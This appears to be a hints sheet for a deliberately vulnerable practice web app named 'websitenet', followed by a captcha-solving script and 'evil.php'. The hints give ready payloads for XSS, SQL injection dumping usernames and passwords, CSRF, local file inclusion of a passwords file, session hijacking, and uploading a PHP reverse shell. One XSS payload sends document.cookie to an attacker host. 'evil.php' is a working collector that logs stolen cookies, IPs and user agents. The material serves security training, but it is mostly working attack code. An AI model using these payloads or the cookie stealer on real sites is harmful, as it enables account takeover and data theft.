=====================
WEBSITENET HINTS 
=====================
-xss-nonpersistent	: http://[websitenet]/guestbook.php?x=[xss]
-xss-persistent		: send message to guestbook with html tag
-sql injection		: inject with: ' or 1='1' union select username,password,3,4,5 from users -- '
-weak password hash	: you may need help to crack the hash of webmaster's password ;)
-captcha		: crack the weak captcha system with crack-captcha.php
-jscript dom injection	: inject with js javascript:void(document.form1.date.value="hacked");
-xsrf			: http://[websitenet]/admin/delete.php?id=[id_to_delete]
-idor			: change admin password by base64_decode() the submitted token (you may need to intercept the HTTP traffic)
-cookie			: hijack cookie PHPSESSID value (from the already logged-in user)
-lfi			: http://[websitenet]/about.php?file=../../passwords.txt
-form upload		: upload any file, for example an interactive php reverse shell (reference: https://github.com/pentestmonkey/php-reverse-shell) 
-cookie steal via xss	: post a guestbook comment like this and let logged in admin view his/her guestbook: <script>var i = new Image();i.src="http://path/to/malware/site/evil.php?cookie="+document.cookie</script>

=====================
captcha-crack.php
=====================
<?php
$url = "http://[websitenet]/guestbook.php";
$str = file_get_contents($url);
$pos1 = strpos($str,"TheCaptcha");
$x = substr($str,$pos1+11,-542);
$equation = str_replace(" ", "", $x);
eval("\$captcha=$equation;");
print $equation."=".$captcha."\n";
?>

=====================
evil.php
=====================
<?php

function GetIP()
{
 if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
  $ip = getenv("HTTP_CLIENT_IP");
 else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
  $ip = getenv("HTTP_X_FORWARDED_FOR");
 else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
  $ip = getenv("REMOTE_ADDR");
 else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
  $ip = $_SERVER['REMOTE_ADDR'];
 else
  $ip = "unknown";
 return($ip);
}

function logData()
{
 $ipLog="log.txt";
 $cookie = $_SERVER['QUERY_STRING'];
 $register_globals = (bool) ini_get('register_gobals');
 if ($register_globals) $ip = getenv('REMOTE_ADDR');
 else $ip = GetIP();

 $rem_port = $_SERVER['REMOTE_PORT'];
 $user_agent = $_SERVER['HTTP_USER_AGENT'];
 $rqst_method = $_SERVER['METHOD'];
 $rem_host = $_SERVER['REMOTE_HOST'];
 $referer = $_SERVER['HTTP_REFERER'];
 $date=date ("l dS of F Y h:i:s A");
 $log=fopen("$ipLog", "a+");

 if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
  fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE:  $cookie <br>");
 else
  fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host |  Agent: $user_agent | METHOD: $rqst_method | REF: $referer |  DATE: $date | COOKIE:  $cookie \n\n");
 fclose($log);
}

logData();

?>


